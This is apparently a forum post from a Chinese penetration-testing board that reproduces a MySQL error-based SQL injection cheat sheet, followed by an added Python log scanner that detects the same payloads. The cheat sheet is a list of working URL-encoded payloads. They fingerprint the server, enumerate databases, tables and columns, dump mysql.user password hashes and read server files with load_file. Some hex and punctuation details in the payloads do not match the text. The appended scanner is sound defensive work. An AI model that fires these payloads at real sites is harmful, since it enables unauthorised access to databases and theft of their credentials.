China Network Penetration Testing Alliance
Title:
MySQL error-based injection reference (pdf)
Author:
admin
Time:
2013-7-27 11:00
This post was last edited by Nightmare on 2013-3-17 14:20
MySQL error-based injection reference (pdf), one post per day...

MySql Error Based Injection Reference

[MySQL error-based injection reference]

Author: pnig0s1992

Blog:
http://pnig0s1992.blog.51cto.com/

TeAm:
http://www.FreeBuf.com/

Tested on MySQL 5.0.91; it works on the vast majority of 5+ versions.

A small number of versions throw an error when name_const() is used; for those, test with the Method.2 given below.

Query the version:

Method.1:and+exists(select*from+(select*from(select+name_const(@@version,0))a+join+(select+name_const(@@version,0))b)c)

Method.2:and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(SELECT+version()))a+from+information_schema.tables+group by a)b)

Query the current user:

Method.1:and+exists(select*from+(select*from(select+name_const(user(),0))a+join+(select+name_const(user(),0))b)c)

Method.2:and+(select+1+from(select+count(*),concat((select+(select+user())+from+information_schema.tables+limit+0,1).floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)

Query the current database:

Method.1:and+exists(select*from+(select*from(select+name_const(database(),0))a+join+(select+name_const(database(),0))b)c)

Method.2:and+(select+1+from(select+count(*),concat((select+(select+database())+from+information_schema.tables+limit+0,1).floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)

Enumerate databases one by one:

and+exists(select*from+(select*from(select+name_const((SELECT+distinct+schema_name+FROM+information_schema.schemata+LIMIT+n,1),0))a+join+(select+name_const((SELECT+distinct+schema_name+FROM+information_schema.schemata+LIMIT+n,1),0))b)c)

Replace n in sequence.

Get the number of tables in a specified database:

and+(select+1+from(select+count(*),concat((select+(select+(SELECT+count(table_name)+FROM+`information_schema`.tables+WHERE+table_schema=0x6D7973716C))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1

0x6D7973716C=mysql

Enumerate tables one by one:

and+(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+table_name+FROM+information_schema.tables+Where+table_schema=0x6D7973716C+limit+n,1))+from+information_schema.tables+limit+0,1).floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1

0x6D7973716C=Mysql; replace n in sequence.

Get the number of columns in a table:

and+(select+1+from(select+count(*),concat((select+(select+(SELECT+count(column_name)+FROM+`information_schema`.columns+WHERE+table_schema=0x6D7973716C+AND+table_name=0x636F6C756D6E735F70726976))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1

Enumerate columns one by one:

and+(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+column_name+FROM+information_schema.columns+Where+table_schema=0x6D7973716C+AND+table_name=0x636F6C756D6E735F70726976+limit+n,1))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1

Replace n in sequence.

Dump contents one by one:

and+(select+1+from(select+count(*),concat((select+(select+(select+password+from+mysql.user+limit+n,1))+from+information_schema.tables+limit+0,1).floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1

Replace n in sequence.

Dump file contents:

and+(SELECT+1+FROM+(select count(*),concat(floor(rand(0)*2),(SELECT+substring(load_file(0x433A5C5C746573742E617361),1,64)))a+from+information_schema.tables+group+by+a)b)

0x433A5C5C626F6F742E696E69=C:\\boot.ini. Because only 64 bytes of content can be dumped at a time, use substring() to control which bytes are shown.

Thx for reading.

No need to download it either,
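From the defender's side, the patterns catalogued in this post are distinctive enough to be matched in web server access logs or a WAF rule. The following Python is an added example, not part of the original post or the author's material: it normalises each request's query string (URL-decoding twice to catch double encoding, folding `+` to space, stripping inline comments and case) and then tests it against signatures derived from the payloads above. The access-log lines, the client addresses (documentation ranges) and the `/news.php` path are constructed for the example.

```python
import re
from urllib.parse import unquote_plus

# Signatures of the error-based techniques listed in the post above.
# Each entry: (name, regex applied to the normalised query string).
SIGNATURES = [
    # name_const() on a constant, self-joined so the duplicate column name errors
    ("name_const_duplicate_column",
     re.compile(r"name_const\s*\(.*?\)\s*\)?\s*\w*\s*join\s*\(", re.S)),
    # floor(rand(0)*2) used as a GROUP BY key (duplicate-entry error)
    ("rand_floor_group_by",
     re.compile(r"floor\s*\(\s*rand\s*\(\s*0?\s*\)\s*\*\s*2\s*\).*?group\s+by", re.S)),
    # reads of the metadata catalogue
    ("information_schema_read",
     re.compile(r"information_schema\s*\.\s*(tables|columns|schemata)")),
    # file read primitive
    ("load_file",
     re.compile(r"load_file\s*\(")),
    # hex literal standing in for a quoted string (table_schema=0x...)
    ("hex_literal_string",
     re.compile(r"=\s*0x[0-9a-f]{2,}")),
]


def normalise(query: str) -> str:
    """Collapse the encodings a sender can vary: decode twice (double encoding),
    '+' -> space, drop /* */ comments, lowercase, squeeze whitespace."""
    s = unquote_plus(unquote_plus(query))
    s = re.sub(r"/\*.*?\*/", " ", s, flags=re.S)
    s = re.sub(r"\s+", " ", s.lower())
    return s


def match_signatures(query: str) -> list:
    """Return the names of all signatures that match the query string."""
    norm = normalise(query)
    return [name for name, rx in SIGNATURES if rx.search(norm)]


# Common Log Format: ip ident user [time] "METHOD target PROTO" status size
LOG_LINE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')


def scan_access_log(lines) -> list:
    """Return one dict per request whose query string matches at least one signature."""
    hits = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue  # not a request line we understand; skip rather than guess
        ip, ts, method, target, status = m.groups()
        path, _, query = target.partition("?")
        names = match_signatures(query) if query else []
        if names:
            hits.append({"ip": ip, "time": ts, "path": path,
                         "status": int(status), "signatures": names})
    return hits


# Constructed sample log: one benign request, three carrying payloads from the
# post, and one benign request that merely contains the words "group by".
SAMPLE_LOG = [
    '203.0.113.7 - - [27/Jul/2013:11:00:01 +0800] "GET /news.php?id=12 HTTP/1.1" 200 5120',
    '203.0.113.7 - - [27/Jul/2013:11:00:02 +0800] "GET /news.php?id=12+and+exists(select*from+(select*from(select+name_const(@@version,0))a+join+(select+name_const(@@version,0))b)c) HTTP/1.1" 500 812',
    '203.0.113.7 - - [27/Jul/2013:11:00:03 +0800] "GET /news.php?id=12+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(SELECT+version()))a+from+information_schema.tables+group+by+a)b) HTTP/1.1" 500 840',
    '198.51.100.4 - - [27/Jul/2013:11:00:04 +0800] "GET /search.php?q=group+by+category HTTP/1.1" 200 2210',
    '203.0.113.7 - - [27/Jul/2013:11:00:05 +0800] "GET /news.php?id=12+and+(SELECT+1+FROM+(select%20count(*),concat(floor(rand(0)*2),(SELECT+substring(load_file(0x433A5C5C626F6F742E696E69),1,64)))a+from+information_schema.tables+group+by+a)b) HTTP/1.1" 500 900',
]

if __name__ == "__main__":
    for hit in scan_access_log(SAMPLE_LOG):
        print(hit["ip"], hit["path"], hit["status"], ",".join(hit["signatures"]))
```

The normalisation step matters more than the regexes: a raw-request match on `floor(rand(0)*2)` alone is defeated by percent-encoding or an inline comment, which is why the example decodes and strips before matching. A 500 status on the same client and path within seconds of a benign 200 is the corroborating signal to look for when triaging the hits.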
Welcome to China Network Penetration Testing Alliance (https://www.cobjon.com/)
Powered by Discuz! X3.2